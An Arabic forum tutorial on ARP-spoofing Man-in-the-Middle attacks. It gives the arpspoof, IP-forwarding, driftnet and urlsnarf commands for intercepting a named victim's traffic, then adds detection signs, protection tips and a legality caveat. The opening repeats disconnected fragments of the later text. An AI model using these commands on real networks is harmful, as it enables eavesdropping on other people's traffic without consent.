- بواسطة x32x01 ||
يعتبر هجوم Man In The Middle (MITM) أو "رجل في المنتصف" واحد من أشهر هجمات الشبكات المستخدمة في اختبار الاختراق وتحليل أمان الشبكات. الفكرة ببساطة إن المهاجم بيحط نفسه بين جهاز الضحية والراوتر، وبالتالي يقدر يشوف البيانات اللي بتتنقل بينهم أو يعدل عليها قبل ما توصل للطرف التاني.
مثال:
هتلاقي قائمة بالواجهات المتاحة، وغالبًا هتكون الواجهة اللاسلكية باسم:
هتظهر نتيجة مشابهة:
الرقم الموجود بعد كلمة via هو عنوان الراوتر.
نفذ الأمر التالي:
💡 الخطوة دي مهمة جدًا لأن بدونها اتصال الإنترنت عند الضحية ممكن يتوقف بالكامل.
لتوجيه الترافيك من الضحية إلى الراوتر عبر جهازك:
📌 افتح Terminal جديد وسيب الأمر شغال.
🔄 دلوقتي جهازك بقى في منتصف الاتصال بالكامل بين الطرفين.
تشغيل الأداة:
📸 هتبدأ تظهر الصور اللي بتمر عبر الاتصال الذي تقوم بتحليله.
الأداة هتعرض جميع عناوين URL التي تمر عبر الشبكة بصيغة سهلة للتحليل.
🌐 مفيدة جدًا أثناء عمليات تحليل الشبكات واختبارات الاختراق.
داخل كل نافذة Terminal شغالة.
بعدها قم بإيقاف إعادة توجيه الحزم:
🔹 بطء مفاجئ في الشبكة.
🔹 ظهور شهادات SSL غير صحيحة.
🔹 تحذيرات HTTPS متكررة.
🔹 تغيّر عنوان MAC الخاص بالراوتر بشكل مفاجئ.
🔹 إعادة توجيه غير طبيعية للصفحات.
إيه اللي هتحتاجه قبل تنفيذ هجوم MITM؟
قبل ما تبدأ لازم تكون عارف شوية معلومات أساسية عن الشبكة:✅ اسم كارت الشبكة المستخدم.
✅ عنوان IP الخاص بالراوتر.
✅ عنوان IP الخاص بالجهاز المستهدف.
مثال:
| البيانات | مثال |
|---|---|
| Network Interface | wlan0 |
| Router IP | 192.168.1.1 |
| Victim IP | 192.168.1.52 |
معرفة اسم كارت الشبكة
استخدم الأمر التالي: Code:
ifconfigwlan0معرفة عنوان IP الخاص بالراوتر
استخدم: Code:
ip route Code:
default via 192.168.1.1 Code:
معرفة عنوان IP الخاص بالهدف
ممكن تعرفه من:- صفحة إدارة الراوتر.
- برامج مراقبة الشبكات.
- أدوات فحص الشبكة.
تفعيل إعادة توجيه الحزم في لينكس
أول خطوة لازم جهازك يشتغل كوسيط بين الضحية والراوتر.نفذ الأمر التالي:
Code:
sysctl -w net.ipv4.ip_forward=1تنفيذ ARP Spoofing بين الضحية والراوتر
أداة arpspoof بتسمح لك بخداع أجهزة الشبكة وإقناعها إن جهازك هو الراوتر الحقيقي.لتوجيه الترافيك من الضحية إلى الراوتر عبر جهازك:
Code:
arpspoof -i wlan0 -t 192.168.1.52 192.168.1.1تنفيذ ARP Spoofing في الاتجاه العكسي
بعد الخطوة السابقة لازم تعمل نفس العملية من الراوتر إلى الضحية. Code:
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.52مراقبة الصور المتبادلة على الشبكة باستخدام Driftnet
أداة Driftnet بتقوم بالتقاط الصور اللي بتمر داخل الترافيك غير المشفر.تشغيل الأداة:
Code:
driftnet -i wlan0مراقبة المواقع التي يتم زيارتها باستخدام Urlsnarf
لو عايز تعرف الروابط والمواقع اللي بيتم الوصول إليها أثناء تحليل الترافيك، تقدر تستخدم: Code:
urlsnarf -i wlan0🌐 مفيدة جدًا أثناء عمليات تحليل الشبكات واختبارات الاختراق.
إيقاف هجوم MITM بشكل صحيح
بعد الانتهاء من عملية الاختبار اضغط: CTRL + Cداخل كل نافذة Terminal شغالة.
بعدها قم بإيقاف إعادة توجيه الحزم:
Code:
sysctl -w net.ipv4.ip_forward=0كيف تكتشف هجمات MITM على شبكتك؟
لو عايز تحمي نفسك من هجوم رجل في المنتصف، راقب العلامات التالية:🔹 بطء مفاجئ في الشبكة.
🔹 ظهور شهادات SSL غير صحيحة.
🔹 تحذيرات HTTPS متكررة.
🔹 تغيّر عنوان MAC الخاص بالراوتر بشكل مفاجئ.
🔹 إعادة توجيه غير طبيعية للصفحات.
طرق الحماية من هجمات Man In The Middle
لحماية الشبكة من هجمات MITM:🛡️ استخدم مواقع HTTPS فقط.
🛡️ فعّل VPN موثوق.
🛡️ حدّث الراوتر باستمرار.
🛡️ استخدم ARP Inspection إن كانت مدعومة.
🛡️ راقب الأجهزة المتصلة بالشبكة بشكل دوري.
🛡️ لا تتصل بشبكات Wi-Fi عامة غير موثوقة.
ملخص سريع
هجوم MITM - Man In The Middle من أشهر هجمات الشبكات المستخدمة في اختبار الاختراق وتحليل أمن الشبكات. يعتمد على وضع المهاجم بين الضحية والراوتر باستخدام تقنية ARP Spoofing لاعتراض الترافيك ومراقبته. ورغم أهمية فهم هذا النوع من الهجمات للمتخصصين في الأمن السيبراني، إلا أن استخدامه يجب أن يكون داخل بيئات قانونية ومصرح بها فقط. التعديل الأخير: